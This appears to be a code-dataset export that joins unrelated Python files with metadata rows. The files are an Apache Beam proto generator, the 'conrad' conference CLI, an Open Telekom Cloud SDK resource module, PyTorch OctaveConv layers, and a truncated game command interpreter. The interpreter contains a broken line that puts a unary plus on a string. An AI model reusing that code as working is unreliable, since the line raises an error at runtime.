raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path) for path in proto_files)):
try:
from grpc_tools import protoc
except ImportError:
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s' % install_path)
try:
start = time.time()
subprocess.check_call(
['pip', 'install', '--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.' % (time.time() - start))
finally:
shutil.rmtree(build_path)
sys.path.append(install_path)
generate_proto_files()
if __name__ == '__main__':
generate_proto_files(force=True)
| 38.126866 | 78 | 0.695831 |
be4f1cb0b7d7607159fd3b7ea853d4ce0b3a4003
| 10,268 |
py
|
Python
|
conrad/cli.py
|
ca-pettarelli/conrad
|
ff8edaa2f3053d6bababff883946067e3469635a
|
[
"Apache-2.0"
] | null | null | null |
conrad/cli.py
|
ca-pettarelli/conrad
|
ff8edaa2f3053d6bababff883946067e3469635a
|
[
"Apache-2.0"
] | null | null | null |
conrad/cli.py
|
ca-pettarelli/conrad
|
ff8edaa2f3053d6bababff883946067e3469635a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import hashlib
import datetime as dt
import click
import requests
import sqlalchemy
from colorama import Fore, Style
from cli_helpers import tabular_output
from . import __version__, CONRAD_HOME
from .db import engine, Session
from .models import Base, Event, Reminder
from .utils import initialize_database, validate
def set_default_pager():
os_environ_pager = os.environ.get("PAGER")
if os_environ_pager == "less":
os.environ["LESS"] = "-SRXF"
def get_events():
response = requests.get(
"https://raw.githubusercontent.com/vinayak-mehta/conrad/master/data/events.json"
)
with open(os.path.join(CONRAD_HOME, "events.json"), "w") as f:
f.write(json.dumps(response.json()))
def refresh_database(events):
session = Session()
for event in events:
event_id = hashlib.md5(
(event["name"] + event["start_date"]).encode("utf-8")
).hexdigest()
e = Event(
id=event_id[:6],
name=event["name"],
url=event["url"],
city=event["city"],
state=event["state"],
country=event["country"],
cfp_open=event["cfp_open"],
cfp_start_date=dt.datetime.strptime(event["cfp_start_date"], "%Y-%m-%d"),
cfp_end_date=dt.datetime.strptime(event["cfp_end_date"], "%Y-%m-%d"),
start_date=dt.datetime.strptime(event["start_date"], "%Y-%m-%d"),
end_date=dt.datetime.strptime(event["end_date"], "%Y-%m-%d"),
source=event["source"],
tags=event["tags"],
kind=event["kind"],
)
session.add(e)
session.commit()
session.close()
@click.group(name="conrad")
@click.version_option(version=__version__)
@click.pass_context
def cli(ctx, *args, **kwargs):
"""conrad: Track conferences and meetups on your terminal!"""
set_default_pager()
@cli.command("refresh", short_help="Refresh event database.")
@click.confirmation_option(prompt="Would you like conrad to look for new events?")
@click.pass_context
def _refresh(ctx, *args, **kwargs):
if not os.path.exists(CONRAD_HOME):
os.makedirs(CONRAD_HOME)
get_events()
if not os.path.exists(os.path.join(CONRAD_HOME, "conrad.db")):
initialize_database()
else:
Event.__table__.drop(engine)
Base.metadata.tables["event"].create(bind=engine)
with open(os.path.join(CONRAD_HOME, "events.json"), "r") as f:
events = json.load(f)
refresh_database(events)
# TODO: print("10 new events found!")
click.echo("Event database updated!")
@cli.command("show", short_help="Show all saved events.")
@click.option(
"--cfp",
"-c",
is_flag=True,
help="Show only events which have an open CFP (call for proposals).",
)
@click.option(
"--tag", "-t", default="", help="Look at conferences with a specific tag."
)
@click.option(
"--name",
"-n",
default="",
help="Look at conferences containing a specific word in their name.",
)
@click.option(
"--location",
"-l",
default="",
help="Look at conferences in a specific city, state or country.",
)
@click.option(
"--date",
"-d",
default=[],
multiple=True,
help='Look at conferences based on when they\'re happening. For example: conrad show --date ">= 2019-10-01" --date "<= 2020-01-01".',
)
@click.pass_context
def _show(ctx, *args, **kwargs):
# TODO: conrad show --new
if not os.path.exists(CONRAD_HOME):
os.makedirs(CONRAD_HOME)
if not os.path.exists(os.path.join(CONRAD_HOME, "conrad.db")):
click.echo("Event database not found, fetching it!")
get_events()
initialize_database()
with open(os.path.join(CONRAD_HOME, "events.json"), "r") as f:
events = json.load(f)
refresh_database(events)
cfp = kwargs["cfp"]
tag = kwargs["tag"]
name = kwargs["name"]
date = list(kwargs["date"])
location = kwargs["location"]
filters = []
if cfp:
filters.append(Event.cfp_open.is_(cfp))
if tag:
filters.append(Event.tags.contains(tag))
if name:
filters.append(Event.name.ilike("%{}%".format(name)))
if date:
date_filters = []
for d in date:
cmp, date = d.split(" ")
if not (">" in cmp or "<" in cmp):
raise click.UsageError("Wrong comparison operator!")
try:
__ = dt.datetime.strptime(date, "%Y-%m-%d")
except ValueError:
raise click.UsageError("Wrong date format!")
if ">" in cmp:
date_filters.append(Event.start_date >= date)
elif "<" in cmp:
date_filters.append(Event.start_date <= date)
filters.append(sqlalchemy.and_(*date_filters))
if location:
filters.append(
sqlalchemy.or_(
Event.city.ilike("%{}%".format(location)),
Event.state.ilike("%{}%".format(location)),
Event.country.ilike("%{}%".format(location)),
)
)
session = Session()
events = list(
session.query(Event).filter(*filters).order_by(Event.start_date).all()
)
if len(events):
header = [
"id",
"name",
"url",
"city",
"state",
"country",
"start_date",
"end_date",
]
events_output = []
for event in events:
events_output.append(
[
event.id,
event.name,
event.url,
event.city,
event.state,
event.country,
event.start_date.strftime("%Y-%m-%d"),
event.end_date.strftime("%Y-%m-%d"),
]
)
session.close()
formatted = tabular_output.format_output(
events_output, header, format_name="ascii"
)
click.echo_via_pager("\n".join(formatted))
else:
click.echo("No events found!")
@cli.command("remind", short_help="Set and display reminders.")
@click.option("--id", "-i", default=None, help="Conference identifier.")
@click.pass_context
def _remind(ctx, *args, **kwargs):
_id = kwargs["id"]
if _id is None:
session = Session()
reminders = list(
session.query(Event, Reminder)
.filter(Event.id == Reminder.id)
.order_by(Event.start_date)
.all()
)
if len(reminders):
header = ["id", "name", "start_date", "days_left"]
reminders_output = []
for reminder, __ in reminders:
start = dt.datetime.now()
if reminder.cfp_open:
delta_days = (reminder.cfp_end_date - start).days
days_left = "{} days left to cfp deadline!".format(delta_days)
else:
delta_days = (reminder.start_date - start).days
days_left = "{} days left!".format(delta_days)
if delta_days > 30:
days_left = Fore.GREEN + Style.BRIGHT + days_left + Style.RESET_ALL
elif delta_days < 30 and delta_days > 10:
days_left = Fore.YELLOW + Style.BRIGHT + days_left + Style.RESET_ALL
elif delta_days < 10:
days_left = Fore.RED + Style.BRIGHT + days_left + Style.RESET_ALL
reminders_output.append(
[
reminder.id,
reminder.name,
reminder.start_date.strftime("%Y-%m-%d"),
days_left,
]
)
session.close()
formatted = tabular_output.format_output(
reminders_output, header, format_name="ascii"
)
click.echo("\n".join(formatted))
else:
click.echo("No reminders found!")
else:
try:
session = Session()
reminder = Reminder(id=_id)
session.add(reminder)
session.commit()
session.close()
click.echo("Reminder set!")
except sqlalchemy.exc.IntegrityError:
session.rollback()
if click.confirm("Do you want to remove this reminder?"):
session = Session()
session.query(Reminder).filter(Reminder.id == _id).delete()
session.commit()
session.close()
click.echo("Reminder removed!")
@cli.command("import", short_help="Import new events into conrad.")
@click.option("--file", "-f", default=None, help="JSON file to import.")
@click.pass_context
def _import(ctx, *args, **kwargs):
file = kwargs["file"]
EVENTS_PATH = os.path.join(os.getcwd(), "data", "events.json")
if file is None:
raise click.UsageError("No file provided!")
if not os.path.exists(file):
raise click.UsageError("File does not exist!")
with open(file, "r") as f:
input_events = json.load(f)
failures = validate(input_events)
if len(failures):
raise click.UsageError(
"The following validations failed!\n{}".format(
"".join(
list(map(lambda x: "- " + x + "\n", failures[:-1]))
+ list(map(lambda x: "- " + x, failures[-1:]))
)
)
)
with open(EVENTS_PATH, "r") as f:
events = json.load(f)
new_events = []
for ie in input_events:
match = False
for e in events:
if (
ie["name"].replace(" ", "").lower()
in e["name"].replace(" ", "").lower()
):
click.echo("Updating {}".format(e["name"]))
e.update(ie)
match = True
if not match:
new_events.append(ie)
events.extend(new_events)
click.echo("Added {} new events!".format(len(new_events)))
with open(EVENTS_PATH, "w") as f:
f.write(json.dumps(events, indent=4, sort_keys=True))
| 31.304878 | 137 | 0.546552 |
3c7ce3c8de69dd9451104db562f1c93cd29b3eac
| 8,961 |
py
|
Python
|
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
opentelekom/otc_resource.py
|
tsdicloud/python-opentelekom-sdk
|
809f3796dba48ad0535990caf7519bb9afa71d2d
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from openstack import resource
from openstack import exceptions
from openstack import utils
def filter_none(d):
if isinstance(d, dict):
return { k: filter_none(v) for k, v in d.items() if v is not None }
elif isinstance(d, list):
return [ filter_none(elem) for elem in d ]
else:
return d
class OtcResource(resource.Resource):
# ===== adaptions of standard methods for OTC
def fetch(self, session, requires_id=True,
base_path=None, error_message=None, **params):
""" Open Telekom Cloud sometimes throws an Bad Request exception.although a
NotFound is required to make find or fetch working
"""
try:
return super().fetch(session=session, requires_id=requires_id,
base_path=base_path, error_message=error_message, **params)
except exceptions.BadRequestException as bad:
raise exceptions.ResourceNotFound(details=bad.details, http_status=404, request_id=bad.request_id)
def _prepare_request(self, requires_id=None, prepend_key=False,
patch=False, base_path=None):
""" Enhance requets preparation by None value elimination """
request = super()._prepare_request(requires_id=requires_id, prepend_key=prepend_key,
patch=patch, base_path=base_path)
request.body = filter_none(request.body)
return request
def _translate_response(self, response, has_body=None, error_message=None):
""" Open Telekom has non-uniform formats for error details,
so we try to adapt the different formats to get useful information out of exceptions """
isError = False
if has_body is None:
has_body = self.has_body
if has_body:
content_type = response.headers.get('content-type', '')
if response.content and 'application/json' in content_type:
oerror = response.json()
emsg = ""
# Normalize to dict if error is described as a sub-structure
if "error" in oerror:
isError = True
oerror = oerror['error']
# first: extract some know code,value pairs
if "code" in oerror:
isError = True
emsg += "[" + str(oerror['code']) + "]"
if "message" in oerror:
emsg += " " + oerror['message'] + "\n"
else:
emsg += "\n"
if "error_code" in oerror:
isError = True
if "error_msg" in oerror:
emsg += " " + oerror['error_msg'] + "\n"
else:
emsg += "\n"
if "errorCode" in oerror:
isError = True
emsg += "[" + oerror['errorCode'] + "]"
if "message" in oerror:
emsg += " " + oerror['message'] + "\n"
else:
emsg += "\n"
# second: collect reasons in case of error to not loose information
if isError:
for reason, msg in oerror.items():
if reason not in ['code', 'error_code', 'errorCode', 'message', 'error_msg']:
emsg += reason + "=" + msg + '\n'
super()._translate_response(response, has_body=has_body, error_message=emsg if isError else None)
#==== additional convenience functions here =====
#==== OpenTelekom Cloud usage of sub-resources to have cleaner APIs ====
class OtcSubResource(resource.Resource):
""" This is an extension for Open Telekom Cloud so that sub-dicts could be defined with
resource fields for better documentation and type control """
def to_dict(self, body=True, headers=False, computed=True,
ignore_none=True, **params):
""" Just redefine behavior of to_dict to ignore Nones """
return super().to_dict(body=body, headers=headers, computed=computed,
ignore_none=ignore_none, **params)
#==== OpenTelekom Cloud key/value extended tag handling ====
class TagMixin(object):
#: A list of associated tags
#: *Type: list of tag strings*
tags = resource.Body('tags', type=dict, default={})
_key_syntax = re.compile('^[0-9a-zA-Z_\-]{1,36}$')
_value_syntax = re.compile('^[0-9a-zA-Z_\-]{0,43}$')
def _checkOtcTagSyntax(self, key, value):
if TagMixin._key_syntax.match(key) == None:
raise exceptions.InvalidRequest(
'Key %s should have 1..36 characters a-zA_Z0-9_-' % key)
if TagMixin._value_syntax.match(value) == None:
raise exceptions.InvalidRequest(
'Value %s should have at most 43 characters a-zA_Z0-9_-' % value)
def _fetch(self, session):
url = utils.urljoin(self.base_path, self.id, 'tags')
session = self._get_session(session)
response = session.get(url)
exceptions.raise_from_response(response)
json = response.json()
tags = {}
if 'tags' in json:
for t in json['tags']:
tags[ t['key'] ] = t['value']
self._body.attributes.update({'tags': tags })
return response
def fetch_tags(self, session):
"""Lists tags set on the entity.
:param session: The session to use for making this request.
:return: The list with tags attached to the entity
"""
# NOTE(gtema): since this is a common method
# we can't rely on the resource_key, because tags are returned
# without resource_key. Do parse response here
self._fetch(session)
return self
def check_tag(self, session, key):
"""Checks if tag exists on the entity.
If the tag does not exist a 404 will be returned
:param session: The session to use for making this request.
:param tag: The tag as a string.
"""
response = self._fetch(session)
if key not in self.tags:
exceptions.raise_from_response(response,
error_message='Tag does not exist')
return self
def add_tag(self, session, key, value):
"""Adds a single key,value tag to the resource.
:param session: The session to use for making this request.
:param key: The tag key as a string.
:param value: The tag value as a string.
"""
self._checkOtcTagSyntax(key, value)
url = utils.urljoin(self.base_path, self.id, 'tags')
session = self._get_session(session)
response = session.post(url=url, json={ "tag": { "key": key, "value": value }})
exceptions.raise_from_response(response)
# we do not want to update tags directly
tags = self.tags
tags[key] = value
self._body.attributes.update({
'tags': tags
})
return self
def remove_tag(self, session, key):
url = utils.urljoin(self.base_path, self.id, 'tags', key)
session = self._get_session(session)
response = session.delete(url=url)
exceptions.raise_from_response(response)
# we do not want to update tags directly
tags = self.tags
del tags[key]
self._body.attributes.update({
'tags': tags
})
return self
def remove_all_tags(self, session):
"""Removes all tags on the entity.
:param session: The session to use for making this request.
"""
self.fetch_tags(session)
keys = list(self.tags.keys())
for key in keys:
self.remove_tag(session, key)
return self
def set_tags(self, session, tags={}):
"""Sets/Replaces all tags on the resource.
:param session: The session to use for making this request.
:param list tags: List with tags to be set on the resource
"""
if len(tags)>10:
raise exceptions.InvalidRequest('Not more than 10 tags allowed!')
for key,value in tags.items():
self._checkOtcTagSyntax(key,value)
self.remove_all_tags(session)
for key,value in dict(tags).items():
self.add_tag(session, key, value)
return self
| 38.625 | 110 | 0.58989 |
b0e95ac292fccb6ebc137c193e42b6a88688fc12
| 10,940 |
py
|
Python
|
layers/OctaveConv1.py
|
IlikeBB/Object-Detection-for-M-NBI
|
650fa1ca7b8860785f0a838dab0301a9cba121d6
|
[
"MIT"
] | 633 |
2019-04-16T16:18:45.000Z
|
2022-03-17T13:39:47.000Z
|
libs/nn/OctaveConv1.py
|
m-and-ms/OctaveConv_pytorch
|
ef971222da74802d61ff2e401e5dcafc4e9233bb
|
[
"MIT"
] | 26 |
2019-04-17T18:26:01.000Z
|
2020-05-29T12:09:26.000Z
|
libs/nn/OctaveConv1.py
|
m-and-ms/OctaveConv_pytorch
|
ef971222da74802d61ff2e401e5dcafc4e9233bb
|
[
"MIT"
] | 99 |
2019-04-17T01:34:28.000Z
|
2021-02-23T02:01:04.000Z
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Xiangtai Li(lxtpku@pku.edu.cn)
# Pytorch Implementation of Octave Conv Operation
# This version uses F.conv2d with learnable sampled weights
import torch
import torch.nn as nn
import torch.nn.functional as F
up_kwargs = {'mode': 'nearest'}
class OctaveConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(OctaveConv, self).__init__()
self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
X_h, X_l = x
if self.stride ==2:
X_h, X_l = self.h2g_pool(X_h), self.h2g_pool(X_l)
X_h2l = self.h2g_pool(X_h)
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0:end_h_x, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2l = F.conv2d(X_l, self.weights[end_h_y:, end_h_x:, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_h2l = F.conv2d(X_h2l, self.weights[end_h_y:, 0: end_h_x, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.conv2d(X_l, self.weights[0:end_h_y, end_h_x:, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.upsample(X_l2h, scale_factor=2, **self.up_kwargs)
X_h = X_h2h + X_l2h
X_l = X_l2l + X_h2l
return X_h, X_l
class FirstOctaveConv(nn.Module):
def __init__(self, in_channels, out_channels,kernel_size, alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(FirstOctaveConv, self).__init__()
self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
if self.stride ==2:
x = self.h2g_pool(x)
X_h2l = self.h2g_pool(x)
X_h = x
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0: end_h_x, :,:], self.bias[0:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_h2l = F.conv2d(X_h2l, self.weights[end_h_y:, 0: end_h_x, :,:], self.bias[end_h_y:], 1,
self.padding, self.dilation, self.groups)
X_h = X_h2h
X_l = X_h2l
return X_h, X_l
class LastOctaveConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs):
super(LastOctaveConv, self).__init__()
self.weights = nn.Parameter(torch.Tensor(out_channels, in_channels, kernel_size[0], kernel_size[1]))
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
if bias:
self.bias = nn.Parameter(torch.Tensor(out_channels))
else:
self.bias = torch.zeros(out_channels).cuda()
self.up_kwargs = up_kwargs
self.h2g_pool = nn.AvgPool2d(kernel_size=(2,2), stride=2)
self.in_channels = in_channels
self.out_channels = out_channels
self.alpha_in = alpha_in
self.alpha_out = alpha_out
def forward(self, x):
X_h, X_l = x
if self.stride ==2:
X_h, X_l = self.h2g_pool(X_h), self.h2g_pool(X_l)
end_h_x = int(self.in_channels*(1- self.alpha_in))
end_h_y = int(self.out_channels*(1- self.alpha_out))
X_h2h = F.conv2d(X_h, self.weights[0:end_h_y, 0:end_h_x, :,:], self.bias[:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.conv2d(X_l, self.weights[0:end_h_y, end_h_x:, :,:], self.bias[:end_h_y], 1,
self.padding, self.dilation, self.groups)
X_l2h = F.upsample(X_l2h, scale_factor=2, **self.up_kwargs)
X_h = X_h2h + X_l2h
return X_h
class OctaveCBR(nn.Module):
def __init__(self,in_channels, out_channels, kernel_size=(3,3),alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(OctaveCBR, self).__init__()
self.conv = OctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels*(1-alpha_out)))
self.bn_l = norm_layer(int(out_channels*alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
x_l = self.relu(self.bn_l(x_l))
return x_h, x_l
class OctaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.5, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs=up_kwargs, norm_layer=nn.BatchNorm2d):
super(OctaveCB, self).__init__()
self.conv = OctaveConv(in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation,
groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.bn_h(x_h)
x_l = self.bn_l(x_l)
return x_h, x_l
class FirstOctaveCBR(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3),alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(FirstOctaveCBR, self).__init__()
self.conv = FirstOctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out,stride,padding,dilation,groups,bias,up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
x_l = self.relu(self.bn_l(x_l))
return x_h, x_l
class LastOCtaveCBR(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(LastOCtaveCBR, self).__init__()
self.conv = LastOctaveConv(in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h = self.conv(x)
x_h = self.relu(self.bn_h(x_h))
return x_h
class FirstOctaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=(3,3), alpha_in=0.0, alpha_out=0.5, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(FirstOctaveCB, self).__init__()
self.conv = FirstOctaveConv(in_channels,out_channels,kernel_size, alpha_in,alpha_out,stride,padding,dilation,groups,bias,up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.bn_l = norm_layer(int(out_channels * alpha_out))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h, x_l = self.conv(x)
x_h = self.bn_h(x_h)
x_l = self.bn_l(x_l)
return x_h, x_l
class LastOCtaveCB(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, alpha_in=0.5, alpha_out=0.0, stride=1, padding=1, dilation=1,
groups=1, bias=False, up_kwargs = up_kwargs, norm_layer=nn.BatchNorm2d):
super(LastOCtaveCB, self).__init__()
self.conv = LastOctaveConv( in_channels, out_channels, kernel_size, alpha_in, alpha_out, stride, padding, dilation, groups, bias, up_kwargs)
self.bn_h = norm_layer(int(out_channels * (1 - alpha_out)))
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x_h = self.conv(x)
x_h = self.bn_h(x_h)
return x_h
if __name__ == '__main__':
# nn.Conv2d
high = torch.Tensor(1, 64, 32, 32).cuda()
low = torch.Tensor(1, 192, 16, 16).cuda()
# test Oc conv
OCconv = OctaveConv(kernel_size=(3,3),in_channels=256,out_channels=512,bias=False,stride=2,alpha_in=0.75,alpha_out=0.75).cuda()
i = high,low
x_out,y_out = OCconv(i)
print(x_out.size())
print(y_out.size())
# test First Octave Cov
i = torch.Tensor(1, 3, 512, 512).cuda()
FOCconv = FirstOctaveConv(kernel_size=(3,3), in_channels=3, out_channels=128).cuda()
x_out, y_out = FOCconv(i)
# test last Octave Cov
LOCconv = LastOctaveConv(kernel_size=(3,3), in_channels=256, out_channels=128, alpha_out=0.75, alpha_in=0.75).cuda()
i = high, low
out = LOCconv(i)
print(out.size())
# test OCB
ocb = OctaveCB(in_channels=256, out_channels=128, alpha_out=0.75, alpha_in=0.75).cuda()
i = high, low
x_out_h, y_out_l = ocb(i)
print(x_out_h.size())
print(y_out_l.size())
ocb_last = LastOCtaveCBR(256,128, alpha_out=0.0, alpha_in=0.75).cuda()
i = high, low
x_out_h = ocb_last(i)
print(x_out_h.size())
| 39.781818 | 148 | 0.634186 |
199a68aef39dfbe1199c1a201f72939cf3134dfd
| 4,551 |
py
|
Python
|
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
Python-Game_Command_Interpreter/src/main.py
|
krzem5/Python-Fraction_Subtraction
|
f937b5a02f6425fb41bac9ddb882ca4a6999fd43
|
[
"BSD-3-Clause"
] | null | null | null |
sayings={'xp amout':'Your Expirience Points:\t','coords':'%s:\tx=%s, y=%s, z=%s'}
errors={'short error':'Number must be smaller than 100001 and greater than -100001','integrer error':'%s must be integrer','no cmd':"Command %s don't exists",'len error':'Invalid lenght of %slist','invalid string':'String %sis invalid','bolean error':'%s is not true or false'}
help_={'xp':'/xp {add/delete} [amout]','help':'/help OR /help [cmd]','tp':'/tp [player] [x] [y] [z]','exit':'/exit','calculator':'/calculator','gamerule':'/gamerule [rule] [status]','effect':'/effect [effect] OR /effect [effect] [amplifier] [strenght]'}
commands=('xp','tp','help','exit','calculator','gamerule','effect')
gamerules={'chatOutput':True,'cheats':False,'characterLine':True}
#PLAYER INPUT(cmd)
# |
# |
# +------ not starting-Y------ chat shows input string
# with "/"
# |
#+---------------N
#+/xp add/delete [short] adds or deletes expirience points @
#+/tp [player] [x] [y] [z] teleports the player to x,y,z @
#+/help OR /help [cmd] show help chat @
#+/exit exits program @
#+/calculator opens calculator @
#+/gamerule [rule] [status] changes gamerules
#+/effect [effect] OR /effect [effect] [amplifier] [strenght]
#+
#+
#+
#+
def interpret_command(cmd,user='krzem'):
output='\n'
global EXP
global coords
if cmd[1:3]=='xp':
if cmd[4:7]=='add':
exp_=cmd[8:]
if exp_.isnumeric():
if 100001>int(exp_)>-100001:
EXP+=int(exp_)
if EXP<0:
EXP=0
output+=sayings['xp amout']+str(EXP)
else:
output+=errors['short error']+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['xp']
elif cmd[4:10]=='delete':
exp_=cmd[11:]
if exp_.isnumeric():
exp_='-'+exp_
if 100001>int(exp_)>-100001:
EXP+=int(exp_)
if EXP<0:
EXP=0
output+=sayings['xp amout']+str(EXP)
else:
output+=errors['short error']+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['integrer error']%('Number')+'\n'
output+='Usage:\t'+help_['xp']
else:
output+=errors['invalid string']%('')+'\n'
output+='Usage:\t'+help_['xp']
elif cmd[1:3]=='tp':
list_tp=cmd[4:].split(' ')
cnt=1
exit_=False
if len(list_tp)==4:
for coord in list_tp:
if not cnt==1:
if not coord.isnumeric():
output+=errors['integrer error']%('Coord')+'\n'
output+='Usage:\t',+help_['tp']
exit_=True
break
cnt+=1
if not exit_:
coords[list_tp[0]]['x']=list_tp[1]
coords[list_tp[0]]['y']=list_tp[2]
coords[list_tp[0]]['z']=list_tp[3]
output+=sayings['coords']%('krzem',coords['krzem']['x'],coords['krzem']['y'],coords['krzem']['z'])
else:
output+=errors['len error']%("coordinater's ")+'\n'
output+='Usage:\t'+help_['tp']
elif cmd[1:5]=='help':
if cmd[5]==' 'and cmd[6:].isalpha():
